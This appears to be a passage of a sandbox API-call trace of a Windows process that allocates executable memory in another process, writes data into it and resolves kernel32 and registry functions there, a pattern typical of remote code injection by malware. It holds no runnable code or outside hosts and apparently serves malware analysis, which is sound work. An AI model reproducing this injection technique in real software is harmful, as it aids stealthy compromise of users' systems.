	[0155.034] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc4ae*, nSize=0x13, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc4ae*, lpNumberOfBytesWritten=0x128494*=0x13) returned 1
	[0155.034] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.034] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.034] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.034] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.035] ResetEvent (hEvent=0x488) returned 1
	[0155.035] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.035] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.035] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.035] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.035] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.035] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004054, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.036] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.036] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.036] lstrlenA (lpString="GetTickCount") returned 12
	[0155.036] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.036] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc49e*, nSize=0xd, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc49e*, lpNumberOfBytesWritten=0x128494*=0xd) returned 1
	[0155.036] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.036] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.036] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.037] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.037] ResetEvent (hEvent=0x488) returned 1
	[0155.037] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.037] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.037] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.037] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.037] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.038] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004058, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.038] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.038] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.038] lstrlenA (lpString="QueryPerformanceCounter") returned 23
	[0155.038] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.038] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc484*, nSize=0x18, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc484*, lpNumberOfBytesWritten=0x128494*=0x18) returned 1
	[0155.039] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.039] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.039] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.039] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.039] ResetEvent (hEvent=0x488) returned 1
	[0155.039] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.040] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.040] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.040] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.040] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.040] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000405c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.040] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.040] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.040] lstrlenA (lpString="InterlockedCompareExchange") returned 26
	[0155.040] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.041] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc466*, nSize=0x1b, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc466*, lpNumberOfBytesWritten=0x128494*=0x1b) returned 1
	[0155.041] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.041] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.041] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.041] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.042] ResetEvent (hEvent=0x488) returned 1
	[0155.042] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.042] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.042] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.042] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.042] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.042] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004060, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.043] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.043] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.043] lstrlenA (lpString="Sleep") returned 5
	[0155.043] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.043] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc45e*, nSize=0x6, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc45e*, lpNumberOfBytesWritten=0x128494*=0x6) returned 1
	[0155.043] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.043] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.043] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.044] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.044] ResetEvent (hEvent=0x488) returned 1
	[0155.044] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.044] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.044] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.044] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.044] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.044] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004064, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.045] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.045] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.045] lstrlenA (lpString="InterlockedExchange") returned 19
	[0155.045] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.045] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc448*, nSize=0x14, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc448*, lpNumberOfBytesWritten=0x128494*=0x14) returned 1
	[0155.045] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.045] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.046] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.046] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.046] ResetEvent (hEvent=0x488) returned 1
	[0155.046] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.046] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.046] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.046] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.046] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.047] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004068, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.047] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.047] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.047] lstrlenA (lpString="SetUnhandledExceptionFilter") returned 27
	[0155.047] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.047] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc538*, nSize=0x1c, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc538*, lpNumberOfBytesWritten=0x128494*=0x1c) returned 1
	[0155.048] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.048] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.048] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.048] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.048] ResetEvent (hEvent=0x488) returned 1
	[0155.048] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.049] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.049] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.049] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.049] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.049] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000406c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.049] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.049] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0155.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc2c4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0155.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc2c4, cbMultiByte=-1, lpWideCharStr=0x23078e8, cchWideChar=13 | out: lpWideCharStr="ADVAPI32.dll") returned 13
	[0155.050] lstrlenW (lpString="ADVAPI32.dll") returned 12
	[0155.050] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.050] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x1a, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128494*=0x1a) returned 1
	[0155.050] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128418 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128418*=0x70) returned 1
	[0155.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.050] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.050] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0xc, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x128410*=0xc) returned 1
	[0155.050] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438*, nSize=0x70, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesWritten=0x128410*=0x70) returned 1
	[0155.051] ResetEvent (hEvent=0x488) returned 1
	[0155.051] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.052] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128410*=0x70) returned 1
	[0155.052] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.053] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.053] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.053] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.053] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.053] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.053] lstrlenA (lpString="RegEnumKeyExW") returned 13
	[0155.053] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.053] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc2a2*, nSize=0xe, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc2a2*, lpNumberOfBytesWritten=0x128494*=0xe) returned 1
	[0155.053] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.054] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.054] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.054] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.054] ResetEvent (hEvent=0x488) returned 1
	[0155.054] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.054] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.055] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.055] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.055] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004000, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.055] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.055] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.055] lstrlenA (lpString="RegOpenKeyExW") returned 13
	[0155.055] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.055] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc292*, nSize=0xe, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc292*, lpNumberOfBytesWritten=0x128494*=0xe) returned 1
	[0155.056] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.056] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.056] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.056] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.057] ResetEvent (hEvent=0x488) returned 1
	[0155.057] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.057] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.057] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.057] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.057] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.057] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004004, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.057] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.058] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.058] lstrlenA (lpString="RegQueryValueExW") returned 16
	[0155.058] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.058] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc27e*, nSize=0x11, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc27e*, lpNumberOfBytesWritten=0x128494*=0x11) returned 1
	[0155.058] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.058] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.058] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.059] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.059] ResetEvent (hEvent=0x488) returned 1
